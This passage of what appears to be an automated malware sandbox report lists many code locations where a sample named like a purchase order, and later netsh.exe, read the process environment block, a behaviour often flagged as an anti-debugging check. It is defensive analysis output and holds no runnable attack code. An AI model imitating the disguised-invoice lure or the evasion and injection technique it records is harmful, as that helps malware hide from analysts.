Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF mov eax, dword ptr fs:[00000030h]	1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222AE4 mov eax, dword ptr fs:[00000030h]	1_2_01222AE4
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222ACB mov eax, dword ptr fs:[00000030h]	1_2_01222ACB
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0127A537 mov eax, dword ptr fs:[00000030h]	1_2_0127A537
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BE539 mov eax, dword ptr fs:[00000030h]	1_2_012BE539
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01203D34 mov eax, dword ptr fs:[00000030h]	1_2_01203D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8D34 mov eax, dword ptr fs:[00000030h]	1_2_012C8D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224D3B mov eax, dword ptr fs:[00000030h]	1_2_01224D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224D3B mov eax, dword ptr fs:[00000030h]	1_2_01224D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01224D3B mov eax, dword ptr fs:[00000030h]	1_2_01224D3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FAD30 mov eax, dword ptr fs:[00000030h]	1_2_011FAD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121C577 mov eax, dword ptr fs:[00000030h]	1_2_0121C577
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121C577 mov eax, dword ptr fs:[00000030h]	1_2_0121C577
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01233D43 mov eax, dword ptr fs:[00000030h]	1_2_01233D43
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01273540 mov eax, dword ptr fs:[00000030h]	1_2_01273540
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A3D40 mov eax, dword ptr fs:[00000030h]	1_2_012A3D40
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01217D50 mov eax, dword ptr fs:[00000030h]	1_2_01217D50
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C05AC mov eax, dword ptr fs:[00000030h]	1_2_012C05AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C05AC mov eax, dword ptr fs:[00000030h]	1_2_012C05AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012235A1 mov eax, dword ptr fs:[00000030h]	1_2_012235A1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]	1_2_011F2D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]	1_2_011F2D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]	1_2_011F2D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]	1_2_011F2D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F2D8A mov eax, dword ptr fs:[00000030h]	1_2_011F2D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01221DB5 mov eax, dword ptr fs:[00000030h]	1_2_01221DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01221DB5 mov eax, dword ptr fs:[00000030h]	1_2_01221DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01221DB5 mov eax, dword ptr fs:[00000030h]	1_2_01221DB5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]	1_2_01222581
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]	1_2_01222581
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]	1_2_01222581
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581 mov eax, dword ptr fs:[00000030h]	1_2_01222581
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82 mov eax, dword ptr fs:[00000030h]	1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122FD9B mov eax, dword ptr fs:[00000030h]	1_2_0122FD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122FD9B mov eax, dword ptr fs:[00000030h]	1_2_0122FD9B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0120D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120D5E0 mov eax, dword ptr fs:[00000030h]	1_2_0120D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]	1_2_012BFDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]	1_2_012BFDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]	1_2_012BFDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BFDE2 mov eax, dword ptr fs:[00000030h]	1_2_012BFDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A8DF1 mov eax, dword ptr fs:[00000030h]	1_2_012A8DF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]	1_2_01276DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]	1_2_01276DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]	1_2_01276DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov ecx, dword ptr fs:[00000030h]	1_2_01276DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]	1_2_01276DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276DC9 mov eax, dword ptr fs:[00000030h]	1_2_01276DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122BC2C mov eax, dword ptr fs:[00000030h]	1_2_0122BC2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C740D mov eax, dword ptr fs:[00000030h]	1_2_012C740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C740D mov eax, dword ptr fs:[00000030h]	1_2_012C740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C740D mov eax, dword ptr fs:[00000030h]	1_2_012C740D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1C06 mov eax, dword ptr fs:[00000030h]	1_2_012B1C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]	1_2_01276C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]	1_2_01276C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]	1_2_01276C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276C0A mov eax, dword ptr fs:[00000030h]	1_2_01276C0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121746D mov eax, dword ptr fs:[00000030h]	1_2_0121746D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122AC7B mov eax, dword ptr fs:[00000030h]	1_2_0122AC7B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A44B mov eax, dword ptr fs:[00000030h]	1_2_0122A44B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128C450 mov eax, dword ptr fs:[00000030h]	1_2_0128C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128C450 mov eax, dword ptr fs:[00000030h]	1_2_0128C450
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120849B mov eax, dword ptr fs:[00000030h]	1_2_0120849B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496 mov eax, dword ptr fs:[00000030h]	1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B14FB mov eax, dword ptr fs:[00000030h]	1_2_012B14FB
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276CF0 mov eax, dword ptr fs:[00000030h]	1_2_01276CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276CF0 mov eax, dword ptr fs:[00000030h]	1_2_01276CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01276CF0 mov eax, dword ptr fs:[00000030h]	1_2_01276CF0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8CD6 mov eax, dword ptr fs:[00000030h]	1_2_012C8CD6
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122E730 mov eax, dword ptr fs:[00000030h]	1_2_0122E730
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B73D mov eax, dword ptr fs:[00000030h]	1_2_0121B73D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B73D mov eax, dword ptr fs:[00000030h]	1_2_0121B73D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C070D mov eax, dword ptr fs:[00000030h]	1_2_012C070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C070D mov eax, dword ptr fs:[00000030h]	1_2_012C070D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A70E mov eax, dword ptr fs:[00000030h]	1_2_0122A70E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A70E mov eax, dword ptr fs:[00000030h]	1_2_0122A70E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F4F2E mov eax, dword ptr fs:[00000030h]	1_2_011F4F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F4F2E mov eax, dword ptr fs:[00000030h]	1_2_011F4F2E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121F716 mov eax, dword ptr fs:[00000030h]	1_2_0121F716
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128FF10 mov eax, dword ptr fs:[00000030h]	1_2_0128FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128FF10 mov eax, dword ptr fs:[00000030h]	1_2_0128FF10
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120FF60 mov eax, dword ptr fs:[00000030h]	1_2_0120FF60
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8F6A mov eax, dword ptr fs:[00000030h]	1_2_012C8F6A
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120EF40 mov eax, dword ptr fs:[00000030h]	1_2_0120EF40
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277794 mov eax, dword ptr fs:[00000030h]	1_2_01277794
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277794 mov eax, dword ptr fs:[00000030h]	1_2_01277794
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01277794 mov eax, dword ptr fs:[00000030h]	1_2_01277794
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01208794 mov eax, dword ptr fs:[00000030h]	1_2_01208794
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012337F5 mov eax, dword ptr fs:[00000030h]	1_2_012337F5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AFE3F mov eax, dword ptr fs:[00000030h]	1_2_012AFE3F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC600 mov eax, dword ptr fs:[00000030h]	1_2_011FC600
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC600 mov eax, dword ptr fs:[00000030h]	1_2_011FC600
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC600 mov eax, dword ptr fs:[00000030h]	1_2_011FC600
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01228E00 mov eax, dword ptr fs:[00000030h]	1_2_01228E00
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1608 mov eax, dword ptr fs:[00000030h]	1_2_012B1608
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A61C mov eax, dword ptr fs:[00000030h]	1_2_0122A61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122A61C mov eax, dword ptr fs:[00000030h]	1_2_0122A61C
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FE620 mov eax, dword ptr fs:[00000030h]	1_2_011FE620
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120766D mov eax, dword ptr fs:[00000030h]	1_2_0120766D
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]	1_2_0121AE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]	1_2_0121AE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]	1_2_0121AE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]	1_2_0121AE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AE73 mov eax, dword ptr fs:[00000030h]	1_2_0121AE73
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]	1_2_01207E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]	1_2_01207E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]	1_2_01207E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]	1_2_01207E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]	1_2_01207E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01207E41 mov eax, dword ptr fs:[00000030h]	1_2_01207E41
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAE44 mov eax, dword ptr fs:[00000030h]	1_2_012BAE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BAE44 mov eax, dword ptr fs:[00000030h]	1_2_012BAE44
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012746A7 mov eax, dword ptr fs:[00000030h]	1_2_012746A7
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C0EA5 mov eax, dword ptr fs:[00000030h]	1_2_012C0EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C0EA5 mov eax, dword ptr fs:[00000030h]	1_2_012C0EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C0EA5 mov eax, dword ptr fs:[00000030h]	1_2_012C0EA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0128FE87 mov eax, dword ptr fs:[00000030h]	1_2_0128FE87
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012216E0 mov ecx, dword ptr fs:[00000030h]	1_2_012216E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012076E2 mov eax, dword ptr fs:[00000030h]	1_2_012076E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01238EC7 mov eax, dword ptr fs:[00000030h]	1_2_01238EC7
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AFEC0 mov eax, dword ptr fs:[00000030h]	1_2_012AFEC0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012236CC mov eax, dword ptr fs:[00000030h]	1_2_012236CC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C8ED6 mov eax, dword ptr fs:[00000030h]	1_2_012C8ED6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942397 mov eax, dword ptr fs:[00000030h]	3_2_03942397
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394B390 mov eax, dword ptr fs:[00000030h]	3_2_0394B390
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D138A mov eax, dword ptr fs:[00000030h]	3_2_039D138A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CD380 mov ecx, dword ptr fs:[00000030h]	3_2_039CD380
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03921B8F mov eax, dword ptr fs:[00000030h]	3_2_03921B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03921B8F mov eax, dword ptr fs:[00000030h]	3_2_03921B8F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03944BAD mov eax, dword ptr fs:[00000030h]	3_2_03944BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03944BAD mov eax, dword ptr fs:[00000030h]	3_2_03944BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03944BAD mov eax, dword ptr fs:[00000030h]	3_2_03944BAD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E5BA5 mov eax, dword ptr fs:[00000030h]	3_2_039E5BA5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039953CA mov eax, dword ptr fs:[00000030h]	3_2_039953CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039953CA mov eax, dword ptr fs:[00000030h]	3_2_039953CA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]	3_2_039403E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]	3_2_039403E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]	3_2_039403E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]	3_2_039403E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]	3_2_039403E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039403E2 mov eax, dword ptr fs:[00000030h]	3_2_039403E2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393DBE9 mov eax, dword ptr fs:[00000030h]	3_2_0393DBE9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3 mov ecx, dword ptr fs:[00000030h]	3_2_039C23E3
